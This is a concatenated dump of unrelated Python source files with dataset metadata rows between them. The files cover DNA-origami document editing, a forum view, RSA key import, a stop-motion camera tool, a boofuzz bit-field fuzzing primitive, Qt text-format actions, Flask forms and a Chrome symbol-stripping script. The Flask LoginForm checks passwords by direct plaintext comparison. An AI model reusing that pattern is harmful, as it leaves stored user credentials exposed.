self.undoStack().beginMacro("Delete selection")
else:
return # nothing left to do
for strand, delete in strand_dict.items():
if delete:
strand.strandSet().removeStrand(strand)
if use_undostack:
self.undoStack().endMacro()
def paintSelection(self, scafColor, stapColor, use_undostack=True):
"""Delete xovers if present. Otherwise delete everything."""
scaf_oligos = {}
stap_oligos = {}
for strandset_dict in self._selection_dict.values():
for strand, value in strandset_dict.items():
if strand.isScaffold():
scaf_oligos[strand.oligo()] = True
else:
stap_oligos[strand.oligo()] = True
if use_undostack:
self.undoStack().beginMacro("Paint strands")
for olg in scaf_oligos.keys():
olg.applyColor(scafColor)
for olg in stap_oligos.keys():
olg.applyColor(stapColor)
if use_undostack:
self.undoStack().endMacro()
def resizeSelection(self, delta, use_undostack=True):
"""
Moves the selected idxs by delta by first iterating over all strands
to calculate new idxs (method will return if snap-to behavior would
create illegal state), then applying a resize command to each strand.
"""
resize_list = []
# calculate new idxs
for strandset_dict in self._selection_dict.values():
for strand, selected in strandset_dict.items():
part = strand.virtualHelix().part()
idxL, idxH = strand.idxs()
newL, newH = strand.idxs()
deltaL = deltaH = delta
# process xovers to get revised delta
if selected[0] and strand.connectionLow():
newL = part.xoverSnapTo(strand, idxL, delta)
if newL == None:
return
deltaH = newL-idxL
if selected[1] and strand.connectionHigh():
newH = part.xoverSnapTo(strand, idxH, delta)
if newH == None:
return
deltaL = newH-idxH
# process endpoints
if selected[0] and not strand.connectionLow():
newL = idxL + deltaL
if selected[1] and not strand.connectionHigh():
newH = idxH + deltaH
if newL > newH: # check for illegal state
return
resize_list.append((strand, newL, newH))
# end for
# end for
# execute the resize commands
if use_undostack:
self.undoStack().beginMacro("Resize Selection")
for strand, idxL, idxH in resize_list:
Strand.resize(strand, (idxL, idxH), use_undostack)
if use_undostack:
self.undoStack().endMacro()
# end def
def updateSelection(self):
"""
do it this way in the future when we have
a better signaling architecture between views
"""
# self.documentSelectedChangedSignal.emit(self._selected_changed_dict)
"""
For now, individual objects need to emit signals
"""
for obj, value in self._selected_changed_dict.items():
obj.selectedChangedSignal.emit(obj, value)
# end for
self._selected_changed_dict = {}
# for ss in self._selection_dict:
# print self.sortedSelectedStrands(ss)
# end def
def resetViews(self):
# This is a fast way to clear selections and the views.
# We could manually deselect each item from the Dict, but we'll just
# let them be garbage collect
# the dictionary maintains what is selected
self._selection_dict = {}
# the added list is what was recently selected or deselected
self._selected_changed_dict = {}
self.documentViewResetSignal.emit(self)
# end def
### PUBLIC METHODS FOR EDITING THE MODEL ###
def addHoneycombPart(self, max_row=prefs.HONEYCOMB_PART_MAXROWS,
max_col=prefs.HONEYCOMB_PART_MAXCOLS,
max_steps=prefs.HONEYCOMB_PART_MAXSTEPS):
"""
Create and store a new DNAPart and instance, and return the instance.
"""
dnapart = None
if len(self._parts) == 0:
dnapart = HoneycombPart(document=self, max_row=max_row,
max_col=max_col, max_steps=max_steps)
self._addPart(dnapart)
return dnapart
def addSquarePart(self, max_row=prefs.SQUARE_PART_MAXROWS,
max_col=prefs.SQUARE_PART_MAXCOLS,
max_steps=prefs.SQUARE_PART_MAXSTEPS):
"""
Create and store a new DNAPart and instance, and return the instance.
"""
dnapart = None
if len(self._parts) == 0:
dnapart = SquarePart(document=self, max_row=max_row,
max_col=max_col, max_steps=max_steps)
self._addPart(dnapart)
return dnapart
def removeAllParts(self):
"""Used to reset the document. Not undoable."""
self.documentClearSelectionsSignal.emit(self)
for part in self._parts:
part.remove(use_undostack=False)
# end def
def removePart(self, part):
self.documentClearSelectionsSignal.emit(self)
self._parts.remove(part)
### PUBLIC SUPPORT METHODS ###
def controller(self):
return self._controller
def setController(self, controller):
"""Called by DocumentController setDocument method."""
self._controller = controller
# end def
def setSelectedPart(self, newPart):
if self._selected_part == newPart:
return
self._selected_part = newPart
# end def
### PRIVATE SUPPORT METHODS ###
def _addPart(self, part, use_undostack=True):
"""Add part to the document via AddPartCommand."""
c = self.AddPartCommand(self, part)
util.execCommandList(
self, [c], desc="Add part", use_undostack=use_undostack)
return c.part()
# end def
### COMMANDS ###
class AddPartCommand(UndoCommand):
"""
Undo ready command for deleting a part.
"""
def __init__(self, document, part):
super(Document.AddPartCommand, self).__init__("add part")
self._doc = document
self._part = part
# end def
def part(self):
return self._part
# end def
def redo(self):
if len(self._doc._parts) == 0:
self._doc._parts.append(self._part)
self._part.setDocument(self._doc)
self._doc.setSelectedPart(self._part)
self._doc.documentPartAddedSignal.emit(self._doc, self._part)
# end def
def undo(self):
self._doc.removePart(self._part)
self._part.setDocument(None)
self._doc.setSelectedPart(None)
self._part.partRemovedSignal.emit(self._part)
# self._doc.documentPartAddedSignal.emit(self._doc, self._part)
# end def
# end class
# end class
| mit | 5,810,336,417,466,848,000 | 35.831461 | 102 | 0.552725 | false | 4.193603 | false | false | false |
CrystallineEntity/bulbs | bulbs/views/home.py | 1 | 1916 | from pyramid.view import view_config
from bulbs.components.subcategory import number_of_threads, number_of_posts, last_post
from bulbs.components import db
def catinfo(cat):
keys = "id", "title", "desc", "slug"
keys_values = zip(keys, cat)
return dict(keys_values)
def categories():
"""Return a dict containing all categories."""
cursor = db.con.cursor()
cursor.execute("SELECT id, title, description, slug FROM bulbs_category")
cats = cursor.fetchall()
data = map(catinfo, cats)
return data
def subcatinfo(data):
keys = "id", "title", "category_id", "desc", "slug"
keys_values = zip(keys, data)
id = data[0]
return dict(keys_values,
id=id,
threads=number_of_threads(id),
posts=number_of_posts(id),
last_post=last_post(id)
)
def subcategories(cat_id=None):
"""Return a dict containing information from a specified category or forums for every category."""
cursor = db.con.cursor()
if cat_id is not None:
cursor.execute(
"SELECT id, title, category_id, description, slug FROM bulbs_subcategory \
WHERE category_id = %s", (cat_id, ))
else:
cursor.execute(
"SELECT id, title, category_id, description, slug FROM bulbs_subcategory")
children = cursor.fetchall()
subcategories_ = map(subcatinfo, children)
return subcategories_
@view_config(route_name="home", renderer="home.mako")
def response(request):
cursor = db.con.cursor()
cats = categories()
subcats = list(subcategories())
cursor.execute("SELECT username FROM bulbs_user ORDER BY date DESC LIMIT 1")
newest_user = cursor.fetchone()[0]
return {
"project": request.registry.settings.get("site_name"),
"title": "Home",
"categories": cats,
"subcategories": subcats,
"new_member": newest_user
}
| mit | -4,394,526,757,759,784,400 | 32.034483 | 102 | 0.634134 | false | 3.642586 | false | false | false |
repotvsupertuga/tvsupertuga.repository | script.module.cryptolib/lib/Crypto/PublicKey/RSA.py | 1 | 2753 | #!/usr/bin/env python
from __future__ import absolute_import
import binascii
import struct
from rsa import PublicKey, PrivateKey
from Crypto.Math.Numbers import Integer
def import_key(extern_key, passphrase=None):
"""Import an RSA key (public or private half), encoded in standard
form.
:Parameter extern_key:
The RSA key to import, encoded as a byte string.
An RSA public key can be in any of the following formats:
- X.509 certificate (binary or PEM format)
- X.509 ``subjectPublicKeyInfo`` DER SEQUENCE (binary or PEM
encoding)
- `PKCS#1`_ ``RSAPublicKey`` DER SEQUENCE (binary or PEM encoding)
- OpenSSH (textual public key only)
An RSA private key can be in any of the following formats:
- PKCS#1 ``RSAPrivateKey`` DER SEQUENCE (binary or PEM encoding)
- `PKCS#8`_ ``PrivateKeyInfo`` or ``EncryptedPrivateKeyInfo``
DER SEQUENCE (binary or PEM encoding)
- OpenSSH (textual public key only)
For details about the PEM encoding, see `RFC1421`_/`RFC1423`_.
The private key may be encrypted by means of a certain pass phrase
either at the PEM level or at the PKCS#8 level.
:Type extern_key: string
:Parameter passphrase:
In case of an encrypted private key, this is the pass phrase from
which the decryption key is derived.
:Type passphrase: string
    :Return: An RSA key object (an `rsa.PublicKey` or `rsa.PrivateKey` instance).
:Raise ValueError/IndexError/TypeError:
When the given key cannot be parsed (possibly because the pass
phrase is wrong).
.. _RFC1421: http://www.ietf.org/rfc/rfc1421.txt
.. _RFC1423: http://www.ietf.org/rfc/rfc1423.txt
.. _`PKCS#1`: http://www.ietf.org/rfc/rfc3447.txt
.. _`PKCS#8`: http://www.ietf.org/rfc/rfc5208.txt
"""
if passphrase is not None:
raise ValueError("RSA key passphrase is not supported")
if extern_key.startswith('ssh-rsa '):
# This is probably an OpenSSH key
keystring = binascii.a2b_base64(extern_key.split(' ')[1])
keyparts = []
while len(keystring) > 4:
l = struct.unpack(">I", keystring[:4])[0]
keyparts.append(keystring[4:4 + l])
keystring = keystring[4 + l:]
e = Integer.from_bytes(keyparts[1])
n = Integer.from_bytes(keyparts[2])
return PublicKey(n._value, e._value)
for fmt in ("PEM", "DER"):
try:
return PrivateKey.load_pkcs1(extern_key, fmt)
except:
try:
return PublicKey.load_pkcs1(extern_key, fmt)
except:
pass
raise ValueError("RSA key format is not supported")
# Backward compatibility
importKey = import_key
| gpl-2.0 | 2,940,562,159,866,837,000 | 33.848101 | 74 | 0.631311 | false | 3.882934 | false | false | false |
fatcloud/PyCV-time | experiments/stop_motion_tool/stop_motion_tool.py | 1 | 1533 | from cam import OpenCV_Cam
import cv2
import os.path
import time
cam = OpenCV_Cam(0)
cam.size = (1920, 1080)
KEY_ESC = 27
KEY_SPACE = ord(' ')
PAGE_DOWN = 2228224 # This make the stop motion to be controllable by presenter.
prevFrame = None
i = 0
#Make a directory on current working directory with date and time as its name
timestr = time.strftime("%Y%m%d-%H%M%S")
cwd = os.getcwd()
dirName = cwd + "\\"+timestr
os.makedirs(dirName)
fname= cwd + "\\frame_.png"
if os.path.isfile(fname):
prevFrame = cv2.imread(fname)
#Make .avi file from collected frames
fourcc = cv2.cv.CV_FOURCC(*'XVID')
video = cv2.VideoWriter(dirName+"\\"+'output_.avi',fourcc, 3.0, cam.size, isColor =True)
while True:
# Capture frame-by-frame
frame = cam.read()
# image processing functions
# Load the frame into a window named as 'Press any key to exit'
if (prevFrame is not None):
showFrame = cv2.addWeighted(frame,0.7,prevFrame,0.3,0)
else:
showFrame = frame
resizeShowFrame = cv2.resize(showFrame, (0,0), fx = 0.5, fy = 0.5 )
cv2.imshow('Press ESC to exit', resizeShowFrame)
# wait for the key
key_code = cv2.waitKey(10)
if key_code is KEY_SPACE or key_code == PAGE_DOWN:
cv2.imwrite(dirName+"\\"+'frame'+str(i)+'_.png', frame)
video.write(frame)
prevFrame = frame
i += 1
elif key_code is KEY_ESC:
cv2.imwrite(cwd + '\\frame_.png', prevFrame)
break
cv2.destroyAllWindows()
cam.release()
video.release()
| mit | 5,548,077,770,134,502,000 | 24.131148 | 88 | 0.641879 | false | 3 | false | false | false |
jtpereyda/boofuzz | boofuzz/primitives/bit_field.py | 1 | 6982 | import struct
from builtins import range
import six
from past.builtins import map
from .. import helpers
from ..constants import LITTLE_ENDIAN
from ..fuzzable import Fuzzable
def binary_string_to_int(binary):
"""
Convert a binary string to a decimal number.
@type binary: str
@param binary: Binary string
@rtype: int
@return: Converted bit string
"""
return int(binary, 2)
def int_to_binary_string(number, bit_width):
"""
Convert a number to a binary string.
@type number: int
@param number: (Optional, def=self._value) Number to convert
@type bit_width: int
@param bit_width: (Optional, def=self.width) Width of bit string
@rtype: str
@return: Bit string
"""
return "".join(map(lambda x: str((number >> x) & 1), range(bit_width - 1, -1, -1)))
class BitField(Fuzzable):
"""
The bit field primitive represents a number of variable length and is used to define all other integer types.
:type name: str, optional
:param name: Name, for referencing later. Names should always be provided, but if not, a default name will be given,
defaults to None
:type default_value: int, optional
:param default_value: Default integer value, defaults to 0
:type width: int, optional
:param width: Width in bits, defaults to 8
:type max_num: int, optional
:param max_num: Maximum number to iterate up to, defaults to None
:type endian: char, optional
:param endian: Endianness of the bit field (LITTLE_ENDIAN: <, BIG_ENDIAN: >), defaults to LITTLE_ENDIAN
:type output_format: str, optional
:param output_format: Output format, "binary" or "ascii", defaults to binary
:type signed: bool, optional
:param signed: Make size signed vs. unsigned (applicable only with format="ascii"), defaults to False
:type full_range: bool, optional
:param full_range: If enabled the field mutates through *all* possible values, defaults to False
:type fuzz_values: list, optional
:param fuzz_values: List of custom fuzz values to add to the normal mutations, defaults to None
:type fuzzable: bool, optional
:param fuzzable: Enable/disable fuzzing of this primitive, defaults to true
"""
def __init__(
self,
name=None,
default_value=0,
width=8,
max_num=None,
endian=LITTLE_ENDIAN,
output_format="binary",
signed=False,
full_range=False,
*args,
**kwargs
):
super(BitField, self).__init__(name=name, default_value=default_value, *args, **kwargs)
assert isinstance(width, six.integer_types), "width must be an integer!"
self.width = width
self.max_num = max_num
self.endian = endian
self.format = output_format
self.signed = signed
self.full_range = full_range
if not self.max_num:
self.max_num = binary_string_to_int("1" + "0" * width)
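        # The default above is 2**width ("1" followed by `width` zero bits), i.e. one
        # past the largest unsigned value representable in `width` bits.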
assert isinstance(self.max_num, six.integer_types), "max_num must be an integer!"
def _iterate_fuzz_lib(self):
if self.full_range:
for i in range(0, self.max_num):
yield i
else:
# try only "smart" values.
interesting_boundaries = [
0,
self.max_num // 2,
self.max_num // 3,
self.max_num // 4,
self.max_num // 8,
self.max_num // 16,
self.max_num // 32,
self.max_num,
]
for boundary in interesting_boundaries:
for v in self._yield_integer_boundaries(boundary):
yield v
# TODO Add a way to inject a list of fuzz values
# elif isinstance(default_value, (list, tuple)):
# for val in iter(default_value):
# yield val
# TODO: Add injectable arbitrary bit fields
def _yield_integer_boundaries(self, integer):
"""
Add the supplied integer and border cases to the integer fuzz heuristics library.
@type integer: int
@param integer: int to append to fuzz heuristics
"""
for i in range(-10, 10):
case = integer + i
if 0 <= case < self.max_num:
# some day: if case not in self._user_provided_values
yield case
def encode(self, value, mutation_context):
temp = self._render_int(
value, output_format=self.format, bit_width=self.width, endian=self.endian, signed=self.signed
)
return helpers.str_to_bytes(temp)
def mutations(self, default_value):
for val in self._iterate_fuzz_lib():
yield val
@staticmethod
def _render_int(value, output_format, bit_width, endian, signed):
"""
Convert value to a bit or byte string.
Args:
value (int): Value to convert to a byte string.
output_format (str): "binary" or "ascii"
bit_width (int): Width of output in bits.
endian: BIG_ENDIAN or LITTLE_ENDIAN
signed (bool):
Returns:
str: value converted to a byte string
"""
if output_format == "binary":
bit_stream = ""
rendered = b""
# pad the bit stream to the next byte boundary.
if bit_width % 8 == 0:
bit_stream += int_to_binary_string(value, bit_width)
else:
bit_stream = "0" * (8 - (bit_width % 8))
bit_stream += int_to_binary_string(value, bit_width)
# convert the bit stream from a string of bits into raw bytes.
for i in range(len(bit_stream) // 8):
chunk_min = 8 * i
chunk_max = chunk_min + 8
chunk = bit_stream[chunk_min:chunk_max]
rendered += struct.pack("B", binary_string_to_int(chunk))
# if necessary, convert the endianness of the raw bytes.
if endian == LITTLE_ENDIAN:
# reverse the bytes
rendered = rendered[::-1]
_rendered = rendered
else:
# Otherwise we have ascii/something else
# if the sign flag is raised and we are dealing with a signed integer (first bit is 1).
if signed and int_to_binary_string(value, bit_width)[0] == "1":
max_num = binary_string_to_int("1" + "0" * (bit_width - 1))
# chop off the sign bit.
val = value & binary_string_to_int("1" * (bit_width - 1))
# account for the fact that the negative scale works backwards.
val = max_num - val - 1
# toss in the negative sign.
_rendered = "%d" % ~val
# unsigned integer or positive signed integer.
else:
_rendered = "%d" % value
return _rendered
| gpl-2.0 | 3,794,698,004,206,549,500 | 33.564356 | 120 | 0.574048 | false | 4.049884 | false | false | false |
mtils/ems | ems/qt/richtext/char_format_actions.py | 1 | 6238 |
from ems.qt import QtWidgets, QtCore, QtGui
from ems.qt.richtext.char_format_proxy import CharFormatProxy
Qt = QtCore.Qt
QObject = QtCore.QObject
QColor = QtGui.QColor
QAction = QtWidgets.QAction
QKeySequence = QtGui.QKeySequence
QFont = QtGui.QFont
QIcon = QtGui.QIcon
QPixmap = QtGui.QPixmap
ThemeIcon = QIcon.fromTheme
QApplication = QtWidgets.QApplication
QColorDialog = QtWidgets.QColorDialog
QFontComboBox = QtWidgets.QFontComboBox
QComboBox = QtWidgets.QComboBox
QFontDatabase = QtGui.QFontDatabase
QTextDocument = QtGui.QTextDocument
QTextCharFormat = QtGui.QTextCharFormat
pyqtSignal = QtCore.pyqtSignal
pyqtSlot = QtCore.pyqtSlot
pyqtProperty = QtCore.pyqtProperty
class CharFormatActions(QObject):
documentChanged = pyqtSignal(QTextDocument)
currentBlockFormatChanged = pyqtSignal(QTextCharFormat)
def __init__(self, parentWidget, signalProxy=None, resourcePath=':/text-editor'):
super(CharFormatActions, self).__init__(parentWidget)
self.resourcePath = resourcePath
self.actions = []
self.widgets = []
self.signals = CharFormatProxy(self) if signalProxy is None else signalProxy
self._addActions(self.parent())
self._document = QTextDocument()
self._lastBlockFormat = None
def getDocument(self):
return self._document
@pyqtSlot(QTextDocument)
def setDocument(self, document):
if self._document is document:
return
if self._document:
self._disconnectFromDocument(self._document)
self._document = document
self.documentChanged.emit(self._document)
document = pyqtProperty(QTextDocument, getDocument, setDocument)
def _disconnectFromDocument(self, document):
return
def _addActions(self, parent):
self.actionTextBold = QAction(
ThemeIcon('format-text-bold', self._icon('bold.png')),
"&Bold", parent, priority=QAction.LowPriority,
shortcut=Qt.CTRL + Qt.Key_B,
triggered=self.signals.setBold, checkable=True)
bold = QFont()
bold.setBold(True)
self.actionTextBold.setFont(bold)
self.signals.boldChanged.connect(self.actionTextBold.setChecked)
self.actions.append(self.actionTextBold)
self.actionTextItalic = QAction(
ThemeIcon('format-text-italic', self._icon('italic.png')),
"&Italic", self, priority=QAction.LowPriority,
shortcut=Qt.CTRL + Qt.Key_I,
triggered=self.signals.setItalic, checkable=True)
italic = QFont()
italic.setItalic(True)
self.actionTextItalic.setFont(italic)
self.signals.italicChanged.connect(self.actionTextItalic.setChecked)
self.actions.append(self.actionTextItalic)
self.actionTextUnderline = QAction(
ThemeIcon('format-text-underline', self._icon('underline.png')),
"&Underline", self, priority=QAction.LowPriority,
shortcut=Qt.CTRL + Qt.Key_U,
triggered=self.signals.setUnderline, checkable=True)
underline = QFont()
underline.setUnderline(True)
self.actionTextUnderline.setFont(underline)
self.actions.append(self.actionTextUnderline)
self.signals.underlineChanged.connect(self.actionTextUnderline.setChecked)
pix = QPixmap(16, 16)
pix.fill(Qt.black)
self.actionTextColor = QAction(QIcon(pix), "&Color...",
self, triggered=self._textColor)
self.signals.foregroundColorChanged.connect(self._colorChanged)
self.actions.append(self.actionTextColor)
self.actionClearFormat = QAction(ThemeIcon('format-text-clear', self._icon('magic.png')),
"&Remove Format", self, priority=QAction.LowPriority,
shortcut=Qt.CTRL + Qt.Key_E,
triggered=self.signals.clearFormat)
self.actions.append(self.actionClearFormat)
self.fontCombo = QFontComboBox()
self.fontCombo.activated[str].connect(self.signals.setFontFamily)
self.signals.fontFamilyChanged.connect(self.setFontFamily)
self.widgets.append(self.fontCombo)
self.sizeCombo = QComboBox()
self.sizeCombo.setObjectName("sizeCombo")
self.sizeCombo.setEditable(True)
self.signals.pointSizeChanged.connect(self.setFontPointSize)
self.widgets.append(self.sizeCombo)
db = QFontDatabase()
for size in db.standardSizes():
self.sizeCombo.addItem("{}".format(size))
self.sizeCombo.activated[str].connect(self._textSize)
self.sizeCombo.setCurrentIndex(
self.sizeCombo.findText(
"{}".format(QApplication.font().pointSize())
)
)
def _textColor(self):
color = self.signals.getForegroundColor()
if not color:
color = QColor(0,0,0)
col = QColorDialog.getColor(color, self.parent())
if not col.isValid():
return
self.signals.setForegroundColor(col)
def _colorChanged(self, color):
pix = QPixmap(16, 16)
pix.fill(color)
self.actionTextColor.setIcon(QIcon(pix))
def _textSize(self, pointSize):
pointSize = float(pointSize)
if pointSize < 0:
return
self.signals.setPointSize(pointSize)
def addToToolbar(self, toolbar, addActions=True, addWidgets=True):
if addActions:
for action in self.actions:
toolbar.addAction(action)
if not addWidgets:
return
for widget in self.widgets:
widget.setParent(toolbar)
toolbar.addWidget(widget)
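    # Rough usage sketch (object names here are illustrative, not part of this module):
    #   actions = CharFormatActions(editor_window)
    #   actions.addToToolbar(toolbar)
    # The proxy in self.signals is expected to relay the current character format of
    # the active text edit to these actions and widgets.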
def setFontFamily(self, family):
self.fontCombo.setCurrentIndex(self.fontCombo.findText(family))
def setFontPointSize(self, pointSize):
self.sizeCombo.setCurrentIndex(self.sizeCombo.findText("{}".format(int(pointSize))))
def iconPath(self, fileName):
return self.resourcePath + '/' + fileName
def _icon(self, fileName):
return QIcon(self.iconPath(fileName)) | mit | 4,689,382,300,073,918,000 | 32.543011 | 97 | 0.648124 | false | 4.14485 | false | false | false |
Murano/microqa | app/forms.py | 1 | 1790 | # -*- coding: utf-8 -*-
from flask import flash
from flask_wtf import Form
from wtforms import StringField, TextAreaField, PasswordField, TextField
from model import User
from wtforms.validators import DataRequired, ValidationError
class QuestionForm(Form):
    title = StringField(u"Заголовок вопроса", validators=[DataRequired()])  # "Question title"
    body = TextAreaField(u"Тело вопроса", validators=[DataRequired()])  # "Question body"
    tags = StringField(u"Тэги (через запятую)", validators=[DataRequired()])  # "Tags (comma-separated)"
class CommentForm(Form):
    body = TextAreaField(u"Ответ", validators=[DataRequired()])  # "Answer"
class LoginForm(Form):
    username = StringField(u"Логин", validators=[DataRequired()])  # "Login"
    password = PasswordField(u"Пароль", validators=[DataRequired()])  # "Password"
    def validate_username(self, field):
        user = self.get_user()
        if user is None:
            raise ValidationError(u'Неверное имя пользователя')  # "Invalid username"
        if user.password != self.password.data:
            raise ValidationError(u'Неверный пароль')  # "Wrong password"
def get_user(self):
return User.objects(username=self.username.data).first()
class RegistrationForm(Form):
    username = TextField(u"Логин", validators=[DataRequired()])  # "Login"
    email = TextField(u"E-mail", validators=[DataRequired()])  # TODO: validate
    password = PasswordField(u"Пароль", validators=[DataRequired()])  # "Password"
def validate_username(self, field):
if User.objects(username=self.username.data):
            raise ValidationError(u'Такой логин уже занят')  # "This login is already taken"
def validate_email(self, field):
if User.objects(email=self.email.data):
            raise ValidationError(u'Такой email адрес уже существует')  # "This email address already exists"
OSVR/UIforETWbins | bin/StripChromeSymbols.py | 1 | 13713 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This script exists to work around severe performance problems when WPA or other
Windows Performance Toolkit programs try to load the symbols for the Chrome
web browser. Some combination of the enormous size of the symbols or the
enhanced debug information generated by /Zo causes WPA to take about twenty
minutes to process the symbols for chrome.dll and chrome_child.dll. When
profiling Chrome this delay happens with every new set of symbols, so with
every new version of Chrome.
This script uses xperf actions to dump a list of the symbols referenced in
an ETW trace. If chrome.dll, chrome_child.dll, content.dll, or blink_web.dll are
detected and if decoded symbols are not found in %_NT_SYMCACHE_PATH% (default is
c:\symcache) then RetrieveSymbols.exe is used to download the symbols from the
Chromium symbol server, pdbcopy.exe is used to strip the private symbols, and
then another xperf action is used to load the stripped symbols, thus converting
them to .symcache files that can be efficiently loaded by WPA.
Locally built Chrome symbols are also supported.
More details on the discovery of this slowness and the evolution of the fix
can be found here:
https://randomascii.wordpress.com/2014/11/04/slow-symbol-loading-in-microsofts-profiler-take-two/
Discussion can be found here:
https://randomascii.wordpress.com/2013/03/09/symbols-the-microsoft-way/
Source code for RetrieveSymbols.exe can be found here:
https://github.com/google/UIforETW/tree/master/RetrieveSymbols
If "chromium-browser-symsrv" is not found in _NT_SYMBOL_PATH or RetrieveSymbols.exe
and pdbcopy.exe are not found then this script will exit early.
With the 10.0.14393 version of WPA the symbol translation problems have largely
been eliminated, which seems like it would make this script unnecessary, but the
symbol translation slowdowns have been replaced by a bug in downloading symbols from
Chrome's symbol server.
"""
from __future__ import print_function
import os
import sys
import re
import tempfile
import shutil
import subprocess
# Set to true to do symbol translation as well as downloading. Set to
# false to just download symbols and let WPA translate them.
strip_and_translate = True
def main():
if len(sys.argv) < 2:
print("Usage: %s trace.etl" % sys.argv[0])
sys.exit(0)
# Our usage of subprocess seems to require Python 2.7+
    if sys.version_info[0] == 2 and sys.version_info[1] < 7:  # use indexing: named attributes need 2.7+
print("Your python version is too old - 2.7 or higher required.")
print("Python version is %s" % sys.version)
sys.exit(0)
symbol_path = os.environ.get("_NT_SYMBOL_PATH", "")
if symbol_path.count("chromium-browser-symsrv") == 0:
print("Chromium symbol server is not in _NT_SYMBOL_PATH. No symbol stripping needed.")
sys.exit(0)
script_dir = os.path.split(sys.argv[0])[0]
retrieve_path = os.path.join(script_dir, "RetrieveSymbols.exe")
pdbcopy_path = os.path.join(script_dir, "pdbcopy.exe")
    if "programfiles(x86)" in os.environ:
# The UIforETW copy of pdbcopy.exe fails to copy some Chrome PDBs that the
# Windows 10 SDK version can copy - use it if present.
pdbcopy_install = os.path.join(os.environ["programfiles(x86)"], r"Windows kits\10\debuggers\x86\pdbcopy.exe")
if os.path.exists(pdbcopy_install):
pdbcopy_path = pdbcopy_install
# This tool converts PDBs created with /debug:fastlink (VC++ 2015 feature) to
# regular PDBs that contain all of the symbol information directly. This is
# required so that pdbcopy can copy the symbols.
un_fastlink_tool = r"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\bin\amd64\mspdbcmf.exe"
if not os.path.exists(un_fastlink_tool):
un_fastlink_tool = None
# RetrieveSymbols.exe requires some support files. dbghelp.dll and symsrv.dll
# have to be in the same directory as RetrieveSymbols.exe and pdbcopy.exe must
# be in the path, so copy them all to the script directory.
for third_party in ["pdbcopy.exe", "dbghelp.dll", "symsrv.dll"]:
if not os.path.exists(third_party):
source = os.path.normpath(os.path.join(script_dir, r"..\third_party", \
third_party))
dest = os.path.normpath(os.path.join(script_dir, third_party))
shutil.copy2(source, dest)
if not os.path.exists(pdbcopy_path):
print("pdbcopy.exe not found. No symbol stripping is possible.")
sys.exit(0)
if not os.path.exists(retrieve_path):
print("RetrieveSymbols.exe not found. No symbol retrieval is possible.")
sys.exit(0)
tracename = sys.argv[1]
# Each symbol file that we pdbcopy gets copied to a separate directory so
# that we can support decoding symbols for multiple chrome versions without
# filename collisions.
tempdirs = []
# Typical output looks like:
# "[RSDS] PdbSig: {0e7712be-af06-4421-884b-496f833c8ec1}; Age: 33; Pdb: D:\src\chromium2\src\out\Release\initial\chrome.dll.pdb"
# Note that this output implies a .symcache filename like this:
# chrome.dll-0e7712beaf064421884b496f833c8ec121v2.symcache
# In particular, note that the xperf action prints the age in decimal, but the
# symcache names use the age in hexadecimal!
pdb_re = re.compile(r'"\[RSDS\] PdbSig: {(.*-.*-.*-.*-.*)}; Age: (.*); Pdb: (.*)"')
pdb_cached_re = re.compile(r"Found .*file - placed it in (.*)")
print("Pre-translating chrome symbols from stripped PDBs to avoid 10-15 minute translation times "
"and to work around WPA symbol download bugs.")
symcache_files = []
# Keep track of the local symbol files so that we can temporarily rename them
# to stop xperf from using -- rename them from .pdb to .pdbx
local_symbol_files = []
#-tle = tolerate lost events
    #-tti = tolerate time inversions
#-a symcache = show image and symbol identification (see xperf -help processing)
#-dbgid = show symbol identification information (see xperf -help symcache)
command = 'xperf -i "%s" -tle -tti -a symcache -dbgid' % tracename
print("> %s" % command)
found_uncached = False
raw_command_output = subprocess.check_output(command, stderr=subprocess.STDOUT)
command_output = str(raw_command_output).splitlines()
for line in command_output:
dllMatch = None # This is the name to use when generating the .symcache files
if line.count("chrome_child.dll") > 0:
# The symcache files for chrome_child.dll use the name chrome.dll for some reason
dllMatch = "chrome.dll"
# Complete list of Chrome executables and binaries. Some are only used in internal builds.
# Note that case matters for downloading PDBs.
for dllName in ["chrome.exe", "chrome.dll", "blink_web.dll", "content.dll", "chrome_elf.dll", "chrome_watcher.dll", "libEGL.dll", "libGLESv2.dll"]:
if line.count("\\" + dllName) > 0:
dllMatch = dllName
if dllMatch:
match = pdb_re.match(line)
if match:
guid, age, path = match.groups()
guid = guid.replace("-", "")
age = int(age) # Prepare for printing as hex
filepart = os.path.split(path)[1]
symcache_file = r"c:\symcache\%s-%s%xv2.symcache" % (dllMatch, guid, age)
if os.path.exists(symcache_file):
#print("Symcache file %s already exists. Skipping." % symcache_file)
continue
# Only print messages for chrome PDBs that aren't in the symcache
found_uncached = True
print("Found uncached reference to %s: %s - %s" % (filepart, guid, age, ))
symcache_files.append(symcache_file)
pdb_cache_path = None
retrieve_command = "%s %s %s %s" % (retrieve_path, guid, age, filepart)
print(" > %s" % retrieve_command)
for subline in os.popen(retrieve_command):
cache_match = pdb_cached_re.match(subline.strip())
if cache_match:
pdb_cache_path = cache_match.groups()[0]
# RetrieveSymbols puts a period at the end of the output, so strip that.
if pdb_cache_path.endswith("."):
pdb_cache_path = pdb_cache_path[:-1]
if strip_and_translate and not pdb_cache_path:
# Look for locally built symbols
if os.path.exists(path):
pdb_cache_path = path
local_symbol_files.append(path)
if pdb_cache_path:
if strip_and_translate:
tempdir = tempfile.mkdtemp()
tempdirs.append(tempdir)
dest_path = os.path.join(tempdir, os.path.basename(pdb_cache_path))
print(" Copying PDB to %s" % dest_path)
# For some reason putting quotes around the command to be run causes
# it to fail. So don't do that.
copy_command = '%s "%s" "%s" -p' % (pdbcopy_path, pdb_cache_path, dest_path)
print(" > %s" % copy_command)
if un_fastlink_tool:
# If the un_fastlink_tool is available then run the pdbcopy command in a
# try block. If pdbcopy fails then run the un_fastlink_tool and try again.
try:
output = str(subprocess.check_output(copy_command, stderr=subprocess.STDOUT))
if output:
print(" %s" % output, end="")
except:
convert_command = '%s "%s"' % (un_fastlink_tool, pdb_cache_path)
print("Attempting to un-fastlink PDB so that pdbcopy can strip it. This may be slow.")
print(" > %s" % convert_command)
subprocess.check_output(convert_command)
output = str(subprocess.check_output(copy_command, stderr=subprocess.STDOUT))
if output:
print(" %s" % output, end="")
else:
output = str(subprocess.check_output(copy_command, stderr=subprocess.STDOUT))
